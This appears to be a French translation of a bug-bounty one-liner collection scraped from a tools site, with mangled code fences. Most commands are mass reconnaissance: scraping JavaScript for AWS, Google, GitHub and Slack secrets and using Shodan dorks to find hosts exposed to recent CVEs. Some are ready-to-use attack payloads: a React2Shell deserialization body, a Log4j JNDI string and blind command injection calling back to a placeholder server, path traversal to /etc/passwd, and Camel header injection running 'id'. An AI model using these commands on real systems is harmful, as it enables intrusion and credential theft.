cat js_files.txt | xargs -P 20 -I{} sh -c 'curl -sk {} 2>/dev/null | grep -oE "(AKIA|ABIA|ACCA|ASIA)[0-9A-Z]{16}" && echo "Found in: {}"' | tee aws_keys_js.txt

Recherche les identifiants de clés d'accès AWS (patterns AKIA, ABIA, ACCA, ASIA)

⚡ 4. Extracteur de clés API Google + URLs Firebase```bash

cat js_files.txt | xargs -P 20 -I{} sh -c 'curl -sk {} 2>/dev/null | grep -oE "(AIza[0-9A-Za-z_-]{35}|[a-z0-9-]+.firebaseio.com|[a-z0-9-]+.firebaseapp.com)" && echo "[SOURCE] {}"' | tee google_firebase_keys.txt

root@kitploit:~
> Extrait les clés API Google et les URLs de base de données/applications Firebase

#### ⚡ 5. Découverte de Buckets S3 en JavaScript```bash
cat js_files.txt | xargs -P 20 -I{} sh -c 'curl -sk {} 2>/dev/null | grep -oE "([a-zA-Z0-9_-]+\.s3\.amazonaws\.com|s3\.amazonaws\.com\/[a-zA-Z0-9_-]+|[a-zA-Z0-9_-]+\.s3\.[a-z0-9-]+\.amazonaws\.com)" | sort -u' | anew s3_buckets_js.txt && cat s3_buckets_js.txt | xargs -I{} sh -c 'curl -sI https://{} 2>/dev/null | head -1 | grep -qE "200|403" && echo "[ACCESSIBLE] {}"'

Trouve des buckets S3 dans du JS et valide l'accessibilité

⚡ 6. Fuites d'adresses IP internes```bash

cat js_files.txt | xargs -P 20 -I{} sh -c 'curl -sk {} 2>/dev/null | grep -oE "(10.[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3}|172.(1[6-9]|2[0-9]|3[01]).[0-9]{1,3}.[0-9]{1,3}|192.168.[0-9]{1,3}.[0-9]{1,3})" && echo "[SOURCE] {}"' | sort -u | tee internal_ips_js.txt

root@kitploit:~
> Découvre les adresses IP internes/privées divulguées dans JavaScript (10.x, 172.16-31.x, 192.168.x)

#### ⚡ 7. Webhooks Slack + Tokens Discord en JS```bash
cat js_files.txt | xargs -P 20 -I{} sh -c 'curl -sk {} 2>/dev/null | grep -oE "(https://hooks\.slack\.com/services/[A-Za-z0-9/]+|[MN][A-Za-z\d]{23,}\.[\w-]{6}\.[\w-]{27})" && echo "[SOURCE] {}"' | tee slack_discord_js.txt

Extrait les URLs de webhook Slack et les tokens de bot Discord

⚡ 8. Détection des tokens GitHub et des clés privées```bash

cat js_files.txt | xargs -P 20 -I{} sh -c 'curl -sk {} 2>/dev/null | grep -oE "(ghp_[a-zA-Z0-9]{36}|gho_[a-zA-Z0-9]{36}|ghu_[a-zA-Z0-9]{36}|ghs_[a-zA-Z0-9]{36}|ghr_[a-zA-Z0-9]{36}|github_pat_[a-zA-Z0-9]{22}_[a-zA-Z0-9]{59}|-----BEGIN (RSA |EC |DSA |OPENSSH )?PRIVATE KEY-----)" && echo "[SOURCE] {}"' | tee github_privkeys_js.txt

root@kitploit:~
> Recherche les jetons d'accès personnels GitHub (tous formats) et les en-têtes de clés privées

#### ⚡ 9. Adresses e-mail + Sous-domaines cachés dans JS```bash
cat js_files.txt | xargs -P 20 -I{} sh -c 'curl -sk {} 2>/dev/null | grep -oE "[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}" | sort -u' | anew emails_js.txt && cat js_files.txt | xargs -P 20 -I{} sh -c 'curl -sk {} 2>/dev/null | grep -oE "https?://[a-zA-Z0-9._-]+\.target\.com[a-zA-Z0-9./?=_-]*"' | unfurl domains | sort -u | anew hidden_subdomains_js.txt

Extrait les adresses e-mail et les sous-domaines cachés référencés dans JavaScript

⚡ 10. Pipeline complet de reconnaissance JS (Tout-en-un)```bash

TARGET="target.com"; mkdir -p js_recon_$TARGET && cat alive.txt | katana -silent -em js -jc -d 3 | grep -iE ".js(?|$)" | httpx -silent -mc 200 | anew js_recon_$TARGET/js_urls.txt && cat js_recon_$TARGET/js_urls.txt | xargs -P 30 -I{} sh -c 'curl -sk {} 2>/dev/null | tee -a js_recon_$TARGET/all_js.txt' && grep -oE "(AKIA|ABIA|ACCA|ASIA)[0-9A-Z]{16}" js_recon_$TARGET/all_js.txt > js_recon_$TARGET/aws_keys.txt; grep -oE "AIza[0-9A-Za-z_-]{35}" js_recon_$TARGET/all_js.txt > js_recon_$TARGET/google_keys.txt; grep -oE "ghp_[a-zA-Z0-9]{36}" js_recon_$TARGET/all_js.txt > js_recon_$TARGET/github_tokens.txt; grep -oE '["'"'"']/[a-zA-Z0-9_/-]+["'"'"']' js_recon_$TARGET/all_js.txt | tr -d '"'"'"'' | sort -u > js_recon_$TARGET/endpoints.txt; echo "[+] JS Recon Complete! Check js_recon_$TARGET/"

root@kitploit:~
> Pipeline complet de reconnaissance JS : découvre les fichiers JS, télécharge tout, extrait les clés AWS/Google/GitHub et les points d'accès API

> **🎯 Conseil pro :** Utilisez `nuclei -t exposures/tokens/` sur les secrets découverts pour valider s'ils sont actifs !

---

## 🆕 Oneliners 2024-2025

### ⚡🔥⚡ React2Shell - CVE-2025-55182 (CVSS 10.0 - CRITIQUE) ⚡🔥⚡

> **💀 RCE critique dans les composants serveur React et Next.js - En exploitation active ! Ajouté au KEV de la CISA 💀**

#### ⚡ Détecter les applications Next.js (Reconnaissance d'abord)```bash
cat alive.txt | httpx -silent -match-string "/_next/" -match-string "__NEXT_DATA__" | anew nextjs_targets.txt

⚡ Vérifier si l'en-tête Next-Action est accepté```bash

curl -s -o /dev/null -w "%{http_code}" -X POST https://target.com -H "Next-Action: test" -H "Content-Type: text/plain" --data '0'

root@kitploit:~
#### ⚡ Détection de masse - En-tête d'action suivante accepté```bash
cat alive.txt | xargs -I@ -P20 sh -c 'RES=$(curl -s -o /dev/null -w "%{http_code}" -X POST @ -H "Next-Action: x" --data "0" 2>/dev/null); [ "$RES" != "404" ] && [ "$RES" != "000" ] && echo "POTENTIALLY VULN: @ [$RES]"' | tee react2shell_candidates.txt

⚡ Créer des fichiers de payload pour les tests```bash

Create payload.json (safe math check - no RCE)

echo '{"then":"$1:proto:then","status":"resolved_model","reason":-1,"value":"{"then":"$B0"}","_response":{"_prefix":"7*7","_formData":{"get":"$1:constructor:constructor"}}}' > payload.json && echo '"$@0"' > trigger.txt

root@kitploit:~
#### ⚡ Vérification manuelle des vulnérabilités avec cURL```bash
curl -X POST https://target.com -H "Next-Action: check" -F "[email protected]" -F "[email protected]" --max-time 5 -v 2>&1 | grep -iE "(49|error|stack|trace)"

⚡ One-liner: Pipeline de détection complet```bash

subfinder -d target.com -silent | httpx -silent | while read url; do CODE=$(curl -s -o /dev/null -w "%{http_code}" -X POST "$url" -H "Next-Action: x" -H "Content-Type: text/plain" --data "0" 2>/dev/null); [[ "$CODE" =~ ^(200|400|500)$ ]] && echo "[NEXT-ACTION ACCEPTED] $url - HTTP $CODE"; done | tee nextjs_react2shell.txt

root@kitploit:~
#### ⚡ Détecter les en-têtes de réponse vulnérables```bash
cat nextjs_targets.txt | xargs -I@ -P10 sh -c 'curl -s -I -X POST @ -H "Next-Action: test" 2>/dev/null | grep -qi "x-action-redirect" && echo "VULN INDICATOR: @"'

⚡ Scan de masse avec httpx + Next-Action Probe```bash

cat alive.txt | httpx -silent -method POST -H "Next-Action: probe" -mc 200,400,500 -title -tech-detect | grep -i "next" | anew react2shell_potential.txt

root@kitploit:~
#### ⚡ Shodan Dork pour les cibles Next.js```bash
shodan search "X-Powered-By: Next.js" --fields ip_str,port,hostnames | awk '{print "https://"$1":"$2}' | httpx -silent | anew shodan_nextjs.txt

⚡ Vérification de modèle Nuclei```bash

nuclei -l nextjs_targets.txt -t http/cves/2025/CVE-2025-55182.yaml -c 30 -o react2shell_nuclei.txt

root@kitploit:~
#### ⚡ Recherche et Test - One-liner complet```bash
subfinder -d target.com -silent | httpx -silent -match-string "/_next/" | tee nextjs.txt | xargs -I@ -P15 sh -c 'R=$(curl -s -w "\n%{http_code}" -X POST @ -H "Next-Action: x" --data "test" 2>/dev/null | tail -1); [ "$R" = "200" ] || [ "$R" = "400" ] && echo "[!] REACT2SHELL CANDIDATE: @"' | anew vuln_candidates.txt

⚡ Vérifier l'endpoint RSC directement```bash

curl -s -X POST "https://target.com/" -H "Next-Action: whatever" -H "Content-Type: multipart/form-data; boundary=----FormBoundary" --data-binary $'------FormBoundary\r\nContent-Disposition: form-data; name="0"\r\n\r\ntest\r\n------FormBoundary--' | head -c 500

root@kitploit:~
#### ⚡ Test par lots à partir d'un fichier avec parallélisation```bash
cat urls.txt | parallel -j20 'curl -s -o /dev/null -w "{} - %{http_code}\n" -X POST {} -H "Next-Action: test" --data "0" 2>/dev/null' | grep -E " - (200|400|500)$" | tee react2shell_batch.txt

⚠️ Affecté : React 19.0.0-19.2.0, Next.js 15.0.4-16.0.6 | ✅ Correctif : Mettre à jour vers React 19.0.1/19.1.2/19.2.1

🎯 Détection clé : Applications acceptant l'en-tête Next-Action + désérialisation RSC = RCE potentielle


🆕 One-liners de découverte des CVE de février 2026

🔍 One-liners axés sur la reconnaissance pour détecter les vulnérabilités critiques de février 2026

⚠️ Remarque : Certains one-liners référencent des chemins nuclei-templates qui peuvent ne pas encore exister dans votre copie locale. Exécutez d'abord nuclei -update-templates et vérifiez que le template existe (ls ~/nuclei-templates/...) avant de lancer la commande. Confirmez toujours les détails CVE auprès de l'avis officiel et restez dans votre périmètre autorisé.

⚡ Découverte de Cisco Catalyst SD-WAN - CVE-2026-20127

Vulnérabilité critique (CVSS 10.0) permettant un contournement de l'authentification dans Cisco SD-WAN Manager/Controller. Exploitée depuis 2023 par des acteurs de menace avancés. La détection des instances vulnérables est cruciale pour protéger les infrastructures critiques.

1. Découvrir les instances exposées de Cisco SD-WAN Manager/vManage via Shodan```bash

shodan search "title:"Cisco vManage" port:8443,443" --fields ip_str,port,org,isp,asn --separator " | " | tee cisco-sdwan-targets.txt

root@kitploit:~
---

### ⚡ Microsoft Azure Functions - Découverte de CVE-2026-21532

> **Vulnérabilité de divulgation d'informations (CVSS 8.2) dans Azure Functions qui permet l'exposition d'identifiants et de configurations sensibles sans authentification. L'identification des points de terminaison vulnérables est essentielle pour prévenir les fuites de secrets.**

#### 1. Énumérer les points de terminaison Azure Functions avec nuclei```bash
cat domains.txt | httpx -silent | nuclei -t ~/nuclei-templates/http/exposures/apis/azure-function-key.yaml -t ~/nuclei-templates/http/exposures/tokens/ -o azure-functions-exposed.txt

⚡ Gradio Framework - Découverte de Path Traversal CVE-2026-28414

Path traversal critique (CVSS 7,5) dans Gradio <6.7 fonctionnant sous Windows avec Python 3.13+. Permet la lecture arbitraire de fichiers. Détecter les versions vulnérables est essentiel pour protéger les applications ML/IA.

1. Identifier les applications Gradio vulnérables et détecter la version```bash

echo "https://target.com" | httpx -silent -tech-detect -json | jq -r 'select(.technologies[]? | select(.name=="Gradio")) | "(.url) - (.technologies[] | select(.name=="Gradio").version // "unknown")"'

root@kitploit:~
---

### ⚡ Gradio Framework - Découverte de SSRF CVE-2026-28416

> **SSRF de haute sévérité (CVSS 8.2) dans Gradio <6.6.0 permettant l'accès aux services de métadonnées cloud (AWS/GCP/Azure). Crucial pour empêcher la compromission des identifiants cloud.**

#### 1. Découvrir les instances Gradio via Google Dorks et l'empreinte numérique```bash
echo "inurl:/gradio/ OR intitle:\"Gradio\"" | gau --subs --threads 10 | httpx -silent -status-code -title -tech-detect | grep -i gradio | tee gradio-instances.txt

⚡ Fortinet FortiOS - CVE-2026-25815 Découverte des identifiants LDAP

Vulnérabilité de divulgation d'identifiants LDAP dans FortiOS ≤7.6.6 due à une clé de chiffrement par défaut faible. Activement exploitée depuis décembre 2025. La détection des versions vulnérables est critique.

1. Identifier les FortiGate/FortiOS vulnérables via Shodan avec leur version```bash

shodan search "product:FortiOS" --fields ip_str,version,port,org --separator " | " | awk -F'|' '$2 ~ /^[1-6].|7.[0-5].|7.6.[0-6]/ {print $1 " | Version:" $2 " | " $4}' | tee fortios-vulnerable.txt

root@kitploit:~
---

### ⚡ Dell RecoverPoint for VMs - Découverte de CVE-2026-22769

> **Identifiants codés en dur critiques (CVSS 10.0) dans Dell RecoverPoint <6.0.3.1 HF1. Permet un accès root à distance. Exploité par des groupes APT chinois depuis 2024. Détection urgente requise.**

#### 1. Détecter les Dell RecoverPoint exposés et identifier Tomcat Manager```bash
shodan search "title:\"RecoverPoint\" http.favicon.hash:-1153767654" --fields ip_str,port,http.title,version --separator " | " | anew dell-recoverpoint-targets.txt

⚡ Windows Shell - CVE-2026-21510 Découverte de contournement de sécurité

Contournement SmartScreen/Mark-of-the-Web (CVSS 8.8) sous Windows 10/11. Permet l'exécution de code via des liens/raccourcis malveillants. Zero-day activement exploitée. L'identification des systèmes vulnérables est essentielle.

1. Identifier les points de terminaison Windows exposés et les versions vulnérables via SMB```bash

nmap -p445 --script smb-os-discovery,smb-protocols --open -iL targets.txt -oG - | grep "Windows 10|Windows 11" | awk '{print $2}' | tee windows-vulnerable-hosts.txt

root@kitploit:~
---

### ⚡ Statamic CMS - CVE-2026-28426 Découverte XSS

> **XSS stocké critique (CVSS 8.7) dans Statamic <5.73.11 et <6.4.0 via les modèles SVG/PDF et Antlers. Permet une escalade de privilèges. Détecter les versions vulnérables protège les panneaux de contrôle.**

#### 1. Découvrir les sites Statamic et extraire la version du CMS```bash
echo "Powered by Statamic" | gau --subs --blacklist jpg,jpeg,gif,css,tif,tiff,png,ttf,woff,woff2,ico | httpx -silent -tech-detect -status-code | grep -i statamic | nuclei -t ~/nuclei-templates/technologies/statamic-detect.yaml -o statamic-sites.txt

⚡ Chartbrew - Découverte d'injection SQL CVE-2026-27005

Injection SQL critique non authentifiée (CVSS 9.8) dans Chartbrew <4.8.3. Permet la lecture/modification des données dans MySQL/PostgreSQL connectés. Détecter les instances vulnérables est urgent.

1. Identifier les instances Chartbrew exposées et vérifier la version via l'API```bash

cat web-apps.txt | httpx -silent -path /api/health -mc 200 -json | jq -r 'select(.body | contains("chartbrew")) | "(.url) - Version: (.body | fromjson | .version // "unknown")"' | tee chartbrew-instances.txt

root@kitploit:~
---

### ⚡ Chartbrew - Découverte de RCE MongoDB CVE-2026-25887

> **RCE via injection de requête MongoDB (CVSS 7.2) dans Chartbrew <4.8.1. Permet l'exécution arbitraire de JavaScript sur le serveur MongoDB. Crucial pour détecter les instances vulnérables avant exploitation.**

#### 1. Énumérer les points de terminaison Chartbrew lors de l'analyse des API vulnérables```bash
subfinder -d target.com -silent | httpx -silent | gau --subs | grep -E "chartbrew|/api/.*chart|/api/.*connection" | httpx -silent -status-code -title -tech-detect | grep -i "chartbrew\|mongo" | anew chartbrew-mongodb-endpoints.txt

⚡ Apache Camel - Découverte d'injection d'en-tête CVE-2026-31650

Injection d'en-tête critique (CVSS 9.1) dans Apache Camel <4.9.2 qui permet un contournement de filtre via la manipulation d'en-tête HTTP (CamelExec*). La détection des points de terminaison Camel exposés protège les pipelines d'intégration d'entreprise.

1. Découvrir les points de terminaison Apache Camel et tester le contournement par injection d'en-tête```bash

cat urls.txt | httpx -silent -H "CamelExecCommandExecutable: id" -H "CamelExecCommandArgs: -la" -mc 200 -match-string "uid=" | anew camel-header-injection.txt

root@kitploit:~
---

### ⚡ Jenkins CI - CVE-2026-30170 Script Console RCE Discovery

> **RCE via Script Console (CVSS 9.8) dans Jenkins <2.503 avec authentification faible ou anonyme activée. Permet l'exécution arbitraire de Groovy. L'identification des instances exposées est urgente pour protéger le pipeline CI/CD.**

#### 1. Identifier les Jenkins exposés et vérifier une Script Console accessible```bash
subfinder -d target.com -silent | httpx -silent -path /script -mc 200 -title -match-string "Script Console" | anew jenkins-script-console-exposed.txt

⚡ Introspection GraphQL - CVE-2026-29812 Découverte de fuite de schéma

Divulgation d'informations (CVSS 7.5) via l'introspection laissée activée en production. Permet une cartographie complète du schéma, des mutations et des types sensibles. La détection de points de terminaison avec introspection ouverte accélère la cartographie de la surface d'attaque.

1. Découvrir les points de terminaison GraphQL et détecter l'introspection activée```bash

cat urls.txt | grep -Ei "graphql|/api" | httpx -silent -X POST -H "Content-Type: application/json" -d '{"query":"{__schema{types{name}}}"}' -mc 200 -match-string "__schema" | anew graphql-introspection-open.txt

root@kitploit:~
---

### ⚡ Ollama IA - Découverte de traversée de chemin du modèle CVE-2026-32154

> **Traversée de chemin (CVSS 8.6) dans Ollama <0.5.9 via l'API `/api/pull` qui permet l'écriture arbitraire de fichiers via des noms de modèles malveillants. La détection des instances Ollama exposées protège l'infrastructure IA locale.**

#### 1. Identifier les serveurs Ollama exposés et énumérer les modèles chargés```bash
shodan search "product:Ollama port:11434" --fields ip_str,port,org --separator " | " | awk -F'|' '{print "http://"$1":11434/api/tags"}' | httpx -silent -mc 200 -json | jq -r '.url + " | " + (.body // "")' | anew ollama-exposed-instances.txt

⚡ Spring Boot Actuator - CVE-2026-33001 Exposition du point de terminaison Env

Exposition de secrets (CVSS 8.2) via un point de terminaison /actuator/env non protégé dans Spring Boot. Fuite des identifiants de base de données, jetons et clés API. La détection massive des actuators ouverts est fondamentale pour éviter les fuites.

1. Découvrir les points de terminaison Spring Actuator exposés et extraire les variables sensibles```bash

cat hosts.txt | httpx -silent -path /actuator/env -mc 200 -json | jq -r 'select(.body | test("password|secret|token|key";"i")) | .url' | anew spring-actuator-env-leak.txt

root@kitploit:~
### Nuclei DAST XSS```bash
echo "https://target.com" | nuclei -dast -t dast/vulnerabilities/xss/ -rl 5

Open Redirect Mass```bash

cat urls.txt | gf redirect | qsreplace "https://evil.com" | httpx -silent -location | grep "evil.com"

root@kitploit:~
### Mauvaise configuration CORS```bash
cat urls.txt | httpx -silent -H "Origin: https://evil.com" -match-string "evil.com" | anew cors_vuln.txt

Injection d'en-tête Host```bash

cat urls.txt | httpx -silent -H "X-Forwarded-Host: evil.com" -match-string "evil.com"

root@kitploit:~
### Injection CRLF```bash
cat urls.txt | qsreplace "%0d%0aX-Injected: header" | httpx -silent -match-string "X-Injected"

Pollution des prototypes```bash

cat js.txt | xargs -I@ curl -s @ | grep -E "(proto|constructor.prototype)" | anew proto_pollution.txt

root@kitploit:~
### Détection d'empoisonnement du cache```bash
cat urls.txt | httpx -silent -H "X-Forwarded-Host: evil.com" -H "X-Original-URL: /admin" -mc 200

Détection de patterns IDOR```bash

cat urls.txt | grep -oE "(id|user|account|uid|pid)=[0-9]+" | sort -u | anew idor_candidates.txt

root@kitploit:~
### Race Condition URLs```bash
cat urls.txt | grep -iE "(redeem|coupon|vote|like|follow|transfer|withdraw)" | anew race_condition.txt

Points d'accès WebSocket```bash

cat urls.txt | grep -iE "(socket|ws://|wss://)" | anew websocket.txt

root@kitploit:~
### Path Traversal```bash
cat urls.txt | gf lfi | qsreplace "....//....//....//etc/passwd" | httpx -silent -match-string "root:x"

XXE Détection```bash

cat urls.txt | grep -iE ".(xml|soap)" | qsreplace ']>&xxe;'

root@kitploit:~
### Scan Log4j```bash
cat urls.txt | qsreplace '${jndi:ldap://YOURSERVER/a}' | httpx -silent -H 'X-Api-Version: ${jndi:ldap://YOURSERVER/a}'

Injection de commande aveugle```bash

cat urls.txt | qsreplace "`curl YOURSERVER`" | httpx -silent cat urls.txt | qsreplace "| curl YOURSERVER" | httpx -silent

root@kitploit:~
### Capture d'écran de masse```bash
cat alive.txt | xargs -I@ gowitness single @ -o screenshots/

Détection de technologies```bash

cat alive.txt | httpx -silent -tech-detect -status-code -title | anew tech_stack.txt

root@kitploit:~
### Favicon Hash (Shodan)```bash
curl -s https://target.com/favicon.ico | md5sum | awk '{print $1}'

Panneaux d'administration exposés```bash

cat alive.txt | httpx -silent -path /admin,/administrator,/admin.php,/wp-admin,/manager,/phpmyadmin -mc 200,301,302 | anew admin_panels.txt

root@kitploit:~
### Points de terminaison de débogage```bash
cat alive.txt | httpx -silent -path /debug,/trace,/actuator,/metrics,/health,/info -mc 200 | anew debug_endpoints.txt

Spring Boot Actuators```bash

cat alive.txt | httpx -silent -path /actuator/env,/actuator/heapdump,/actuator/mappings -mc 200 | anew spring_actuators.txt

root@kitploit:~
### Énumération WordPress```bash
cat alive.txt | httpx -silent -path /wp-json/wp/v2/users -mc 200 | anew wp_users.txt

Mode de débogage Laravel```bash

cat alive.txt | httpx -silent -match-string "Whoops" -match-string "Laravel" | anew laravel_debug.txt

root@kitploit:~
### Django Debug```bash
cat alive.txt | httpx -silent -match-string "Django" -match-string "DEBUG" | anew django_debug.txt

Contrebande de requêtes HTTP```bash

cat alive.txt | python3 smuggler.py -q 2>/dev/null | anew smuggling.txt

root@kitploit:~
### Vérification de contournement CSP```bash
cat alive.txt | httpx -silent -include-response-header | grep -i "content-security-policy" | anew csp_headers.txt

Sous-domaine à partir du favicon```bash

curl -s https://target.com/favicon.ico | python3 -c "import mmh3,sys,codecs;print(mmh3.hash(codecs.encode(sys.stdin.buffer.read(),'base64')))"

root@kitploit:~
---

## 🔍 Moteurs de recherche pour hackers

| Moteur | Lien | Description |
|:------:|:----:|:-----------:|
| **Shodan** | [shodan.io](https://shodan.io) | Recherche d'appareils IoT |
| **Censys** | [censys.io](https://censys.io) | Données de scan Internet |
| **Fofa** | [fofa.info](https://en.fofa.info) | Recherche cyberspace |
| **ZoomEye** | [zoomeye.org](https://zoomeye.org) | Cartographie cyberspace |
| **Hunter** | [hunter.how](https://hunter.how) | Découverte d'actifs |
| **Netlas** | [netlas.io](https://netlas.io) | Surface d'attaque |
| **GreyNoise** | [greynoise.io](https://viz.greynoise.io) | Scanneurs Internet |
| **Onyphe** | [onyphe.io](https://onyphe.io) | Cyberdéfense |
| **CriminalIP** | [criminalip.io](https://criminalip.io) | Renseignement sur les menaces |
| **FullHunt** | [fullhunt.io](https://fullhunt.io) | Surface d'attaque |
| **Quake** | [quake.360.net](https://quake.360.net) | Recherche cyberspace |
| **Leakix** | [leakix.net](https://leakix.net) | Détection de fuites |
| **URLScan** | [urlscan.io](https://urlscan.io) | Analyse d'URL |
| **DNSDumpster** | [dnsdumpster.com](https://dnsdumpster.com) | Reconnaissance DNS |
| **crt.sh** | [crt.sh](https://crt.sh) | Recherche de certificats |
| **SecurityTrails** | [securitytrails.com](https://securitytrails.com) | Historique DNS |
| **Pulsedive** | [pulsedive.com](https://pulsedive.com) | Renseignement sur les menaces |
| **VirusTotal** | [virustotal.com](https://virustotal.com) | Analyse de fichiers/URL |
| **PublicWWW** | [publicwww.com](https://publicwww.com) | Recherche de code source |
| **Grep.app** | [grep.app](https://grep.app) | Recherche de code GitHub |

---

## 📖 Listes de mots recommandées

| Liste de mots | Lien | Cas d'utilisation |
|:---------|:----:|:---------|
| **SecLists** | [GitHub](https://github.com/danielmiessler/SecLists) | Tout |
| **FuzzDB** | [GitHub](https://github.com/fuzzdb-project/fuzzdb) | Fuzzing |
| **Assetnote** | [wordlists.assetnote.io](https://wordlists.assetnote.io) | Contenu web |
| **OneListForAll** | [GitHub](https://github.com/six2dez/OneListForAll) | Combinée |
| **jhaddix all.txt** | [GitHub](https://gist.github.com/jhaddix/86a06c5dc309d08580a018c66354a056) | Répertoires |
| **commonspeak2** | [GitHub](https://github.com/assetnote/commonspeak2-wordlists) | Monde réel |

---

## 📚 Ressources d'apprentissage

### Livres
- Web Application Hacker's Handbook
- Real-World Bug Hunting par Peter Yaworski
- Bug Bounty Bootcamp par Vickie Li

### Plateformes
- [HackerOne](https://hackerone.com)
- [Bugcrowd](https://bugcrowd.com)
- [Intigriti](https://intigriti.com)
- [YesWeHack](https://yeswehack.com)

### Pratique
- [PortSwigger Web Security Academy](https://portswigger.net/web-security)
- [PentesterLab](https://pentesterlab.com)
- [HackTheBox](https://hackthebox.com)
- [TryHackMe](https://tryhackme.com)

### Blogs et ressources
- [PortSwigger Research](https://portswigger.net/research)
- [ProjectDiscovery Blog](https://blog.projectdiscovery.io)
- [Assetnote Blog](https://blog.assetnote.io)

---

## 🙏 Remerciements spéciaux

<div align="center">

| Chasseur | Chasseur | Chasseur |
|:------:|:------:|:------:|
| [@bt0s3c](https://twitter.com/bt0s3c) | [@MrCl0wnLab](https://twitter.com/MrCl0wnLab) | [@stokfredrik](https://twitter.com/stokfredrik) |
| [@Jhaddix](https://twitter.com/Jhaddix) | [@TomNomNom](https://twitter.com/TomNomNom) | [@NahamSec](https://twitter.com/NahamSec) |
| [@zseano](https://twitter.com/zseano) | [@pry0cc](https://twitter.com/pry0cc) | [@pdiscoveryio](https://twitter.com/pdiscoveryio) |
| [@jeff_foley](https://twitter.com/jeff_foley) | [@haaborern](https://twitter.com/haaborern) | [@0xacb](https://twitter.com/0xacb) |

</div>

---

## 🤝 Contribuer

<div align="center">

Nous accueillons les contributions de la communauté ! Votre expertise améliore ce dépôt.

[![Contributors](https://img.shields.io/github/contributors/KingOfBugbounty/KingOfBugBountyTips?style=for-the-badge&color=blue)](https://github.com/KingOfBugbounty/KingOfBugBountyTips/graphs/contributors)
[![Pull Requests](https://img.shields.io/github/issues-pr/KingOfBugbounty/KingOfBugBountyTips?style=for-the-badge&color=green)](https://github.com/KingOfBugbounty/KingOfBugBountyTips/pulls)
[![Issues](https://img.shields.io/github/issues/KingOfBugbounty/KingOfBugBountyTips?style=for-the-badge&color=orange)](https://github.com/KingOfBugbounty/KingOfBugBountyTips/issues)

</div>

### 💡 Comment contribuer

<details>
<summary><b>📝 Cliquez pour voir les directives de contribution</b></summary>

<br>

1. **Forkez le dépôt**   ```bash
   git clone https://github.com/KingOfBugbounty/KingOfBugBountyTips.git
   cd KingOfBugBountyTips
  1. Créer une nouvelle branche ```bash git checkout -b feature/your-contribution

    root@kitploit:~
  2. Ajoutez votre contenu

    • Ajoutez de nouveaux one-liners avec une documentation appropriée
    • Incluez des références et des explications de source
    • Suivez le format et la structure existants
  3. Soumettez une Pull Request

    • Rédigez une description claire de vos modifications
    • Référencez tout problème associé
    • Attendez la révision et les retours

✨ Ce que vous pouvez apporter

  • 🎯 De nouveaux one-liners et techniques de bug bounty
  • 🔧 Guides et astuces d'installation d'outils
  • 📚 Ressources et références supplémentaires
  • 🐛 Corrections de bugs et améliorations
  • 📖 Améliorations de la documentation
  • 🌐 Traductions vers d'autres langues
Stars
Étoiles
Forks
Forks
Watchers
Observateurs
Contributors
Contributeurs

📈 Graphique de croissance

Star History Chart

RessourceLien
🏠 Page d'accueilKing of Bug Bounty Tips
🛠️ KingRecon DODOutil de reconnaissance automatisé
🐧 BugBuntu OSTélécharger ici
📺 Chaîne YouTubeOFJAAAH
💬 Groupe TelegramRejoindre la communauté
🐦 Twitter/X@ofjaaah
💼 LinkedInSe connecter
🐛 Signaler des problèmesGitHub Issues
🔐 Problèmes de sécuritéAvis de sécurité